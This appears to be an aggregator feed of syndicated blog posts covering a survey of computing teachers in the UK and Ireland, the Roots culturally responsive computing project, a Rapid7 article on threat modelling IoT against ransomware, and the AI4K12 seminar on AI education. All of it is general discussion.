Today we launch a survey for computing teachers across Ireland and the UK. The purpose of this survey is to find out about the experiences of computing teachers across the UK and Ireland, including what you teach, your approaches to teaching, and professional development opportunities that you have found useful. You can access it by clicking one of these buttons:

The survey is:

  • Open to all early years, primary, secondary, sixth-form, and further education teachers in Ireland, England, Northern Ireland, Scotland, and Wales who have taught any computing or computer science (even a tiny bit) in the last year
  • Available in English, Welsh, Gaelic, and Irish/Gaeilge
  • Anonymous, and we aim to make the data openly available, in line with our commitment to open-source data; the survey collects no personal data
  • Designed to take you 20 to 25 minutes to complete

The survey will be open for four weeks, until 7 March. When you complete the survey, you’ll have the opportunity to enter a prize draw for a £50 book token per week, so if you complete the survey in the first week, you automatically get four chances to win a token!

We’re aiming for 1000 teachers to complete the survey, so please do fill it in and share it with your colleagues. If you can help us now, we’ll be able to share the survey findings on this website and other channels in the summer.

“Computing education in Ireland — as in many other countries — has changed so much in the last decade, and perhaps even more so in the last few years. Understanding teachers’ views is vital for so many reasons: to help develop, inform, and steer much-needed professional development; to inform policymakers on actions that will have positive effects for teachers working in the classroom; and to help researchers identify and conduct research in areas that will have real impact on and for teachers.”

– Keith Quille (Technological University Dublin), member of the research project team

What computing is taught in the UK and Ireland?

There are key differences in the provision of computer science and computing education across the UK and Ireland, not least what we all call the subject.

In England, the mandatory national curriculum subject is called Computing, but for learners electing to take qualifications such as GCSE and A level, the subject is called computer science. Computing is taught in all schools from age 5, and is a broad subject covering digital literacy as well as elements of computer science, such as algorithms and programming; networking; and computer architecture.

Male teacher and male students at a computer

In Northern Ireland, the teaching curriculum involves developing Cross-Curricular Skills (CCS) and Thinking Skills and Personal Capabilities. This means that from the Early Years Foundation Stage to the end of key stage 3, “using ICT” is one of the three statutory CCS, alongside “communication” and “using mathematics”, which must be included in lessons. At GCSE and A level, the subject (for those who select it) is called Digital Technology, with GCSE students being able to choose between GCSE Digital Technology (Multimedia) and GCSE Digital Technology (Programming).

In Scotland, the ​​Curriculum for Excellence is divided into two phases: the broad general education (BGE) and the senior phase. In the BGE, from age 3 to 15 (the end of the third year of secondary school), all children and young people are entitled to a computing science curriculum as part of the Technologies framework. In S4 to S6, young people may choose to extend and deepen their learning in computing science through National and Higher qualification courses.

A computing teacher and students in the classroom.

In Wales, computer science will be part of a new Science & Technology area of learning and experience for all learners aged 3-16. Digital competence is also a statutory cross-curricular skill alongside literacy and numeracy;  this includes Citizenship; Interacting and collaborating; Producing; and Data and computational thinking. Wales offers a new GCSE and A level Digital Technology, as well as GCSE and A level Computer Science.

Ireland has introduced the Computer Science for Leaving Certificate as an optional subject (age ranges typically from 15 to 18), after a pilot phase which began in 2018. The Leaving Certificate subject includes three strands: practices and principles; core concepts; and computer science in practice. At junior cycle level (age ranges typically from 12 to 15), an optional short course in coding is now available. The short course has three strands: Computer science introduction; Let’s get connected; and Coding at the next level

What is the survey?

The survey is a localised and slightly adapted version of METRECC, which is a comprehensive and validated survey tool developed in 2019 to benchmark and measure developments of the teaching and learning of computing in formal education systems around the world. METRECC stands for ‘MEasuring TeacheR Enacted Computing Curriculum’. The METRECC survey has ten categories of questions and is designed to be completed by practising computing teachers.

Using existing standardised survey instruments is good research practice, as it increases the reliability and validity of the results. In 2019, METRECC was used to survey teachers in England, Scotland, Ireland, Italy, Malta, Australia, and the USA. It was subsequently revised and has been used more recently to survey computing teachers in South Asia and in four countries in Africa.

A computing teacher and a learner do physical computing in the primary school classroom.

With sufficient responses, we hope to be able to report on the resources and classroom practices of computing teachers, as well as on their access to professional development opportunities. This will enable us to not only compare the UK’s four devolved nations and Ireland, but also to report on aspects of the teaching of computing in general, and on how teachers perceive the teaching of the subject. As computing is a relatively new subject whatever country you are in, it’s crucial to gather and analyse this information so that we can develop our understanding of the teaching of computing. 

The research team

For this project, we are working as a team of researchers across the UK and Ireland. Together we have a breadth of experience around the development of computing as a school subject (using this broad term to also cover digital competencies and digital technology) in our respective countries. We also have experience of quantitative research and reporting, and we are aiming to publish the results in an academic journal as well as disseminate them to a wider audience. 

In alphabetical order, on the team are:

  • Elizabeth Cole, who researches early years and primary programming education at the Centre for Computing Science Education (CCSE), University of Glasgow
  • Tom Crick, who is Professor of Digital Education & Policy at Swansea University and has been involved in policy development around computing in Wales for many years
  • Diana Kirby, who is a Programme Coordinator at the Raspberry Pi Foundation
  • Nicola Looker, who is a Lecturer in Secondary Education at Edgehill University, and a PhD student at CCSE, University of Glasgow, researching programming pedagogy
  • Keith Quille, who is a Senior Lecturer in Computing at Technological University Dublin
  • Sue Sentance, who is the Director of the Raspberry Pi Computing Education Research Centre at University of Cambridge; and Chief Learning Officer at the Raspberry Pi Foundation

In addition, Dr Irene Bell, Stranmillis University College, Belfast, has been assisting the team to ensure that the survey is applicable for teachers in Northern Ireland. Keith, Sue, and Elizabeth were part of the original team that designed the survey in 2019.

How can I find out more?

On this page, you’ll see more information about the survey and our findings once we start analysing the data. You can bookmark the page, as we will keep it updated with the results of the survey and any subsequent publications.

The post Calling all Computing and ICT teachers in the UK and Ireland: Have your say appeared first on Raspberry Pi.

The Roots project: Implementing culturally responsive computing teaching in schools in England

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/culturally-responsive-computing-teaching-schools-england-roots-research-project/

Since last year, we have been investigating culturally relevant pedagogy and culturally responsive teaching in computing education. This is an important part of our research to understand how to make computing accessible to all young people. We are now continuing our work in this area with a new project called Roots, bridging our research team here at the Foundation and the team at the Raspberry Pi Computing Education Research Centre, which we jointly created with the University of Cambridge in its Department of Computer Science and Technology.

Across both organisations, we’ve got great ambitions for the Centre, and I’m delighted to have been appointed as its Director. It’s a great privilege to lead this work. 

What do we mean by culturally relevant pedagogy?

Culturally relevant pedagogy is a framework for teaching that emphasises the importance of incorporating and valuing all learners’ knowledge, ways of learning, and heritage. It promotes the development of learners’ critical consciousness of the world and encourages them to ask questions about ethics, power, privilege, and social justice. Culturally relevant pedagogy emphasises opportunities to address issues that are important to learners and their communities.

Culturally responsive teaching builds on the framework above to identify a range of teaching practices that can be implemented in the classroom. These include:

  • Drawing on learners’ cultural knowledge and experiences to inform the curriculum
  • Providing opportunities for learners to choose personally meaningful projects and express their own cultural identities
  • Exploring issues of social justice and bias

The story so far

The overall objective of our work in this area is to further our understanding of ways to engage underrepresented groups in computing. In 2021, funded by a Special Projects Grant from ACM’s Special Interest Group in Computer Science Education (SIGCSE), we established a working group of teachers and academics who met up over the course of three months to explore and discuss culturally relevant pedagogy. The result was a collaboratively written set of practical guidelines about culturally relevant and responsive teaching for classroom educators.

The video below is an introduction for teachers who may not be familiar with the topic, showing the perspectives of three members of the working group and their students. You can also find other resources that resulted from this first phase of the work, and read our Special Projects Report.

We’re really excited that, having developed the guidelines, we can now focus on how culturally responsive computing teaching can be implemented in English schools through the Roots project, a new, related project supported by funding from Google. This funding continues Google’s commitment to grow the impact of computer science education in schools, which included a £1 million donation to support us and other organisations to develop online courses for teachers.

The next phase of work: Roots

In our new Roots project, we want to learn from practitioners how culturally responsive computing teaching can be implemented in classrooms in England, by supporting teachers to plan activities, and listening carefully to their experiences in school. Our approach is similar to the Research-Practice-Partnership (RPP) approach used extensively in the USA to develop research in computing education; this approach hasn’t yet been used in the UK. In this way, we hope to further develop and improve the guidelines with exemplars and case studies, and to increase our understanding of teachers’ motivations and beliefs with respect to culturally responsive computing teaching.

The pilot phase of the Roots project starts this month and will run until December 2022. During this phase, we will work with a small group of schools around London, Essex, and Cambridgeshire. Longer-term, we aim to scale up this work across the UK.

The project will be centred around two workshops held in participating teachers’ schools during the first half of the year. In the first workshop, teachers will work together with facilitators from the Foundation and the Raspberry Pi Computing Education Research Centre to discuss culturally responsive computing teaching and how to make use of the guidelines in adapting existing lessons and programmes of study. The second workshop will take place after the teachers have implemented the guidelines in their classroom, and it will be structured around a discussion of the teachers’ experiences and suggestions for iteration of the guidelines. We will also be using a visual research methodology to create a number of videos representing the new knowledge gleaned from all participants’ experiences of the project. We’re looking forward to sharing the results of the project later on in the year. 

We’re delighted that Dr Polly Card will be leading the work on this project at the Raspberry Pi Computing Education Research Centre, University of Cambridge, together with Saman Rizvi in the Foundation’s research team and Katie Vanderpere-Brown, Assistant Headteacher, Saffron Walden County High School, Essex and Computing Lead of the NCCE London, Hertfordshire and Essex Computing Hub.

More about equity, diversity, and inclusion in computing education

We hold monthly research seminars here at the Foundation, and in the first half of 2021, we invited speakers who focus on a range of topics relating to equity, diversity, and inclusion in computing education.

As well as holding seminars and building a community of interested people around them, we share the insights from speakers and attendees through video recordings of the sessions, blog posts, and the speakers’ presentation slides. We also publish a series of seminar proceedings with referenced chapters written by the speakers.

You can download your copy of the proceedings of the equity, diversity, and inclusion series now.  

The post The Roots project: Implementing culturally responsive computing teaching in schools in England appeared first on Raspberry Pi.

Is the Internet of Things the Next Ransomware Target?

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2022/01/20/is-the-internet-of-things-the-next-ransomware-target/

Is the Internet of Things the Next Ransomware Target?

Ransomware attacks over the last couple years have been traumatic, impacting nearly every business sector and costing billions of dollars. The targets have mostly been our data: steal it, encrypt it, and then charge us a fee to get it back.

Over the last several years, there’s been concern across the security community about the risks related to the Internet of Things (IoT) being impacted by ransomware. For the most part, this has not occurred — although I wouldn’t be surprised if IoT has played a role as the entry point that malicious actors have used, on occasion, to gain access to plant their ransomware on critical systems. Also, we do know of examples where IoT technologies, such as those used within medical and industrial control environments, were impacted during ransomware attacks through key components of their ecosystem involving standard Windows server and desktop solutions.

IoT ransomware risk and its implications

So, what would it take for IoT to be the target of ransomware? First, the IoT being attacked would need to be a large deployment with significant importance in its functions and capabilities. The attack would also need to be disruptive enough that an organization would be willing to pay.  

Personally, I’m not confident such an environment exists, at least as it would apply to the average organization. But let’s step back and look at this from the perspective of the vendor who remotely manages, controls, and updates their products over the Internet. For example, imagine what would happen if a malicious actor successfully breached an automotive organization with smart-capable cars — could they shut down every car and lock the company and owner out of fixing them?

If we apply that train of thought across the board for all IoT deployed out there, it becomes very concerning. What if we shut down every multifunction printer by a major manufacturer, home thermostat, building HVAC, or building lighting solution? What happens if the target is a smart city and traffic lights are impacted? We could go on all day talking about the impact from smart city breaches or attacks against small deployed IoT solutions from major brands with global footprints.

Building a threat model

So, are there steps we can take to head off such an event? The answer is yes. I believe IoT vendors and solution owners could best accomplish this by identifying the potential attack vector and risk through threat modeling.

As part of building out a threat model, the first step would be to identify and map out a complete conceptual structure of the IoT system that could be potentially targeted. In the case of IoT technology, this should consist of all components of the system ecosystem that make the solution function as intended, which would include:

  • Embedded hardware system actuators, sensors, and gateways
  • Management and control applications, such as mobile and cloud services, as well as thick clients on servers, desktops, and laptops systems
  • Communication infrastructure used for data and operational controls including Ethernet, Wi-Fi, and other radio frequency (RF)

Any component or subcomponent of this ecosystem is at potential risk for being targeted. Mapping out this information gives us the ability to better understand and consider the potential points of attack that a malicious actor could use to deliver or execute a ransomware style attack against IoT.

In the second step of this threat modeling process, we need to understand the possible goals of a malicious actor who would be targeting an IoT ecosystem, who they may be, and what their end game and potential methods of attack would look like. The threat actors would likely look very similar to any malicious actor or group that carries out ransomware attacks. I think the big difference would be how they would approach attacking IoT ecosystems.

This is the phase where creative thinking plays a big role, and having the right people involved can make all the difference. This means having people on the threat modeling team who can take an attacker mindset and apply that thinking against the IoT ecosystems to map out as many potential attack vectors as possible.

Mapping out the threat and response

The third step in the threat modeling process is building a list of threats we would expect to be used against the above IoT ecosystems. One example, which is also common with typical ransomware attacks, is locking. By locking a component of the IoT solutions ecosystem, a malicious actor could prevent the IoT ecosystem from properly functioning or communicating with other key components, completely taking the technology out of service or preventing it from functioning as intended.

In the final part, we take the detailed information we’ve put together and map out specific attack scenarios with the greatest chance of success. Each scenario should define the various components of the IoT ecosystem potentially at risk, along with the perceived attacker motives, methods, and threats that can lead to the attacker being successful. Once you’ve mapped out these various scenarios in detail, you can use them to define and implement specific controls to mitigate or reduce the probability of success for those attack scenarios.

Using these threat modeling methods will help IoT solution vendors and the organizations that use their products identify and mitigate the risk and impact of ransomware attacks against IoT solutions before they happen.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

The AI4K12 project: Big ideas for AI education

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/ai-education-ai4k12-big-ideas-ai-thinking/

What is AI thinking? What concepts should we introduce to young people related to AI, including machine learning (ML), and data science? Should we teach with a glass-box or an opaque-box approach? These are the questions we’ve been grappling with since we started our online research seminar series on AI education at the Raspberry Pi Foundation, co-hosted with The Alan Turing Institute.

Over the past few months, we’d already heard from researchers from the UK, Germany, and Finland. This month we virtually travelled to the USA, to hear from Prof. Dave Touretzky (Carnegie Mellon University) and Prof. Fred G. Martin (University of Massachusetts Lowell), who have pioneered the influential AI4K12 project together with their colleagues Deborah Seehorn and Christina Gardner-McLure.

The AI4K12 project

The AI4K12 project focuses on teaching AI in K-12 in the US. The AI4K12 team have aligned their vision for AI education to the CSTA standards for computer science education. These Standards, published in 2017, describe what should be taught in US schools across the discipline of computer science, but they say very little about AI. This was the stimulus for starting the AI4K12 initiative in 2018. A number of members of the AI4K12 working group are practitioners in the classroom who’ve made a huge contribution in taking this project from ideas into the classroom.

Dave Touretzky presents the five big ideas of the AI4K12 project at our online research seminar.
Dave gave us an overview of the AI4K12 project (click to enlarge)

The project has a number of goals. One is to develop a curated resource directory for K-12 teachers, and another to create a community of K-12 resource developers. On the AI4K12.org website, you can find links to many resources and sign up for their mailing list. I’ve been subscribed to this list for a while now, and fascinating discussions and resources have been shared. 

Five Big Ideas of AI4K12

If you’ve heard of AI4K12 before, it’s probably because of the Five Big Ideas the team has set out to encompass the AI field from the perspective of school-aged children. These ideas are: 

  1. Perception — the idea that computers perceive the world through sensing
  2. Representation and reasoning — the idea that agents maintain representations of the world and use them for reasoning
  3. Learning — the idea that computers can learn from data
  4. Natural interaction — the idea that intelligent agents require many types of knowledge to interact naturally with humans
  5. Societal impact — the idea that artificial intelligence can impact society in both positive and negative ways

Sometimes we hear concerns that resources being developed to teach AI concepts to young people are narrowly focused on machine learning, particularly supervised learning for classification. It’s clear from the AI4K12 Five Big Ideas that the team’s definition of the AI field encompasses much more than one area of ML. Despite being developed for a US audience, I believe the description laid out in these five ideas is immensely useful to all educators, researchers, and policymakers around the world who are interested in AI education.

Fred Martin presents one of the five big ideas of the AI4K12 project at our online research seminar.
Fred explained how ‘representation and reasoning’ is a big idea in the AI field (click to enlarge)

During the seminar, Dave and Fred shared some great practical examples. Fred explained how the big ideas translate into learning outcomes at each of the four age groups (ages 5–8, 9–11, 12–14, 15–18). You can find out more about their examples in their presentation slides or the seminar recording (see below). 

I was struck by how much the AI4K12 team has thought about progression — what you learn when, and in which sequence — which we do really need to understand well before we can start to teach AI in any formal way. For example, looking at how we might teach visual perception to young people, children might start when very young by using a tool such as Teachable Machine to understand that they can teach a computer to recognise what they want it to see, then move on to building an application using Scratch plugins or Calypso, and then to learning the different levels of visual structure and understanding the abstraction pipeline — the hierarchy of increasingly abstract things. Talking about visual perception, Fred used the example of self-driving cars and how they represent images.

A diagram of the levels of visual structure.
Fred used this slide to describe how young people might learn abstracted elements of visual structure

AI education with an age-appropriate, glass-box approach

Dave and Fred support teaching AI to children using a glass-box approach. By ‘glass-box approach’ we mean that we should give students information about how AI systems work, and show the inner workings, so to speak. The opposite would be a ‘opaque-box approach’, by which we mean showing students an AI system’s inputs and the outputs only to demonstrate what AI is capable of, without trying to teach any technical detail.

AI4K12 advice for educators supporting K-12 students: 1. Use transparent AI demonstrations. 2. Help students build mental models. 3. Encourage students to build AI applications.
AI4K12 teacher guidelines for AI education

Our speakers are keen for learners to understand, at an age-appropriate level, what is going on “inside” an AI system, not just what the system can do. They believe it’s important for young people to build mental models of how AI systems work, and that when the young people get older, they should be able to use their increasing knowledge and skills to develop their own AI applications. This aligns with the views of some of our previous seminar speakers, including Finnish researchers Matti Tedre and Henriikka Vartiainen, who presented at our seminar series in November

What is AI thinking?

Dave addressed the question of what AI thinking looks like in school. His approach was to start with computational thinking (he used the example of the Barefoot project’s description of computational thinking as a starting point) and describe AI thinking as an extension that includes the following skills:

  • Perception 
  • Reasoning
  • Representation
  • Machine learning
  • Language understanding
  • Autonomous robots

Dave described AI thinking as furthering the ideas of abstraction and algorithmic thinking commonly associated with computational thinking, stating that in the case of AI, computation actually is thinking. My own view is that to fully define AI thinking, we need to dig a bit deeper into, for example, what is involved in developing an understanding of perception and representation.

An image demonstrating that AI systems for object recognition may not distinguish between a real banana on a desk and the photo of a banana on a laptop screen.
Image: Max Gruber / Better Images of AI / Ceci n’est pas une banane / CC-BY 4.0

Thinking back to Matti Tedre and Henriikka Vartainen’s description of CT 2.0, which focuses only on the ‘Learning’ aspect of the AI4K12 Five Big Ideas, and on the distinct ways of thinking underlying data-driven programming and traditional programming, we can see some differences between how the two groups of researchers describe the thinking skills young people need in order to understand and develop AI systems. Tedre and Vartainen are working on a more finely granular description of ML thinking, which has the potential to impact the way we teach ML in school.

There is also another description of AI thinking. Back in 2020, Juan David Rodríguez García presented his system LearningML at one of our seminars. Juan David drew on a paper by Brummelen, Shen, and Patton, who extended Brennan and Resnick’s CT framework of concepts, practices, and perspectives, to include concepts such as classification, prediction, and generation, together with practices such as training, validating, and testing.

What I take from this is that there is much still to research and discuss in this area! It’s a real privilege to be able to hear from experts in the field and compare and contrast different standpoints and views.

Resources for AI education

The AI4K12 project has already made a massive contribution to the field of AI education, and we were delighted to hear that Dave, Fred, and their colleagues have just been awarded the AAAI/EAAI Outstanding Educator Award for 2022 for AI4K12.org. An amazing achievement! Particularly useful about this website is that it links to many resources, and that the Five Big Ideas give a framework for these resources.

Through our seminars series, we are developing our own list of AI education resources shared by seminar speakers or attendees, or developed by us. Please do take a look.

Join our next seminar

Through these seminars, we’re learning a lot about AI education and what it might look like in school, and we’re having great discussions during the Q&A section.

On Tues 1 February at 17:00–18:30 GMT, we’ll hear from Tara Chklovski, who will talk about AI education in the context of the Sustainable Development Goals. To participate, click the button below to sign up, and we will send you information about joining. I really hope you’ll be there for this seminar!

The schedule of our upcoming seminars is online. You can also (re)visit past seminars and recordings on the blog.

The post The AI4K12 project: Big ideas for AI education appeared first on Raspberry Pi.